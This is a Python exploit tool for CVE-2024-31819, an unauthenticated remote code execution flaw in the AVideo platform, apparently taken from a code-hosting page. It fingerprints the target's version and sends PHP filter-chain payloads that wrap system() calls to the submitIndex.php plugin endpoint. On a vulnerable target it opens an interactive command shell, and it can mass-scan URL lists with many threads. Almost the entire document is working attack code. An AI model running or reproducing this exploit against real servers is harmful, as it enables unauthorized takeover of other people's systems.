README.md
Rendering markdown...
import re
import requests
import argparse
from packaging import version
from rich.console import Console
from alive_progress import alive_bar
from prompt_toolkit import PromptSession
from prompt_toolkit.formatted_text import HTML
from prompt_toolkit.history import InMemoryHistory
from php_filter_chain import PHPFilterChainGenerator
from concurrent.futures import ThreadPoolExecutor, as_completed
requests.packages.urllib3.disable_warnings(
requests.packages.urllib3.exceptions.InsecureRequestWarning
)
class AVideoExploit:
def __init__(self, base_url):
self.console = Console()
self.base_url = base_url
def custom_print(self, message: str, header: str) -> None:
header_colors = {"+": "green", "-": "red", "!": "yellow", "*": "blue"}
self.console.print(
f"[bold {header_colors.get(header, 'white')}][{header}][/bold {header_colors.get(header, 'white')}] {message}"
)
def generate_php_filter_payload(self, command):
generator = PHPFilterChainGenerator()
return generator.generate_filter_chain(command)
def send_payload(self, payload):
headers = {"Content-Type": "application/x-www-form-urlencoded"}
try:
response = requests.post(
f"{self.base_url}/plugin/WWBNIndex/submitIndex.php",
data={"systemRootPath": payload},
headers=headers,
verify=False,
timeout=10,
)
if response.status_code == 200:
return response.text
else:
return False
except requests.exceptions.RequestException as e:
return False
def parse_output(self, output):
match = re.search(r"\[S\](.*?)\[E\]", output, re.DOTALL)
if match:
return match.group(1).strip()
else:
return None
def interactive_shell(self):
session = PromptSession(history=InMemoryHistory())
while True:
try:
cmd = session.prompt(
HTML("<ansiyellow><b>$ </b></ansiyellow>"), default=""
).strip()
if cmd.lower() == "exit":
break
if cmd.lower() == "clear":
self.console.clear()
continue
php_code = f"<?php echo '[S]';system('{cmd}');echo '[E]';?>"
payload = self.generate_php_filter_payload(php_code)
output = self.send_payload(payload)
if output:
clean_output = self.parse_output(output)
if clean_output:
print(f"{clean_output}\n")
else:
self.custom_print(
"No command output returned or error occurred.", "-"
)
else:
self.custom_print(
"Failed to receive response from the server.", "-"
)
except KeyboardInterrupt:
self.custom_print("Exiting interactive shell...", "!")
break
def check_single_url(self, url):
try:
version_status, avideo_version = self.is_version_vulnerable(url)
if version_status:
php_code = "<?php echo '[S]';system('whoami');echo '[E]';?>"
payload = self.generate_php_filter_payload(php_code)
headers = {"Content-Type": "application/x-www-form-urlencoded"}
response = requests.post(
f"{url}/plugin/WWBNIndex/submitIndex.php",
data={"systemRootPath": payload},
headers=headers,
verify=False,
timeout=10,
)
if response.status_code == 200:
output = self.parse_output(response.text)
if output:
return (
f"{url} is vulnerable, Version: {avideo_version}, Command output: {output}\n",
True,
)
return (
f"{url} is not vulnerable or failed to execute command, Version: {avideo_version}\n",
False,
)
elif avideo_version:
return (
f"{url} Version: {avideo_version} is not within the vulnerable range.\n",
False,
)
else:
return (
f"{url} AVideo version could not be determined. Manual check advised.\n",
False,
)
except requests.exceptions.RequestException:
return (f"{url} Request failed.\n", False)
def check_avideo_version(self, url):
try:
response = requests.get(url, verify=False, timeout=10)
version_pattern = re.compile("Powered by AVideo ® Platform v([\d.]+)")
match = version_pattern.search(response.text)
if match:
return match.group(1)
comment_version_pattern = re.compile(r"<!--.*?v:([\d.]+).*?-->", re.DOTALL)
comment_match = comment_version_pattern.search(response.text)
if comment_match:
return comment_match.group(1)
except requests.exceptions.RequestException as e:
return None
def is_version_vulnerable(self, url):
avideo_version_str = self.check_avideo_version(url)
if avideo_version_str is None:
return True, "unknown"
parsed_version = version.parse(avideo_version_str)
if isinstance(parsed_version, version.Version):
is_vulnerable = (
version.parse("12.4") <= parsed_version <= version.parse("14.2")
)
return is_vulnerable, avideo_version_str
else:
return True, avideo_version_str
def check_urls_and_write_output(self, urls, max_workers, output_path):
with ThreadPoolExecutor(max_workers=max_workers) as executor, alive_bar(
len(urls), enrich_print=False
) as bar:
futures = {executor.submit(self.check_single_url, url): url for url in urls}
for future in as_completed(futures):
result, is_vulnerable = future.result()
if is_vulnerable:
self.custom_print(result, "+")
if output_path:
with open(output_path, "a") as file:
file.write(result)
bar()
if output_path:
print(f"Results written to {output_path}")
def main():
parser = argparse.ArgumentParser(
description="AVideo CVE-2024-31819 - Unauthenticated Remote Code Execution"
)
parser.add_argument("-u", "--url", help="Base URL for single target", default=None)
parser.add_argument(
"-f", "--file", help="File containing list of URLs", default=None
)
parser.add_argument(
"-t", "--threads", help="Number of threads to use", type=int, default=20
)
parser.add_argument(
"-o", "--output", help="Output file to save results", default=None
)
args = parser.parse_args()
if not args.url and not args.file:
print(
"Error: No URL or file provided. Use -u to specify a single URL or -f to specify a file containing URLs."
)
return
avideo = AVideoExploit(args.url)
if args.url:
is_vulnerable_version, avideo_version = avideo.is_version_vulnerable(args.url)
proceed_with_check = True
if avideo_version != "unknown":
if is_vulnerable_version:
avideo.custom_print(
f"Version {avideo_version} is within the vulnerable range. Proceeding with vulnerability check.",
"+",
)
else:
avideo.custom_print(
f"Version {avideo_version} is not within the vulnerable range. Detected version: {avideo_version}",
"-",
)
proceed_with_check = False
else:
avideo.custom_print(
"Unable to determine AVideo version. Proceeding with vulnerability check as a precaution.",
"!",
)
if proceed_with_check:
output, is_vulnerable = avideo.check_single_url(args.url)
if is_vulnerable:
avideo.custom_print(output, "+")
avideo.interactive_shell()
else:
avideo.custom_print(
"The URL is not vulnerable or failed to execute the command.", "-"
)
elif args.file:
with open(args.file, "r") as f:
urls = f.read().splitlines()
avideo.check_urls_and_write_output(urls, args.threads, args.output)
if __name__ == "__main__":
main()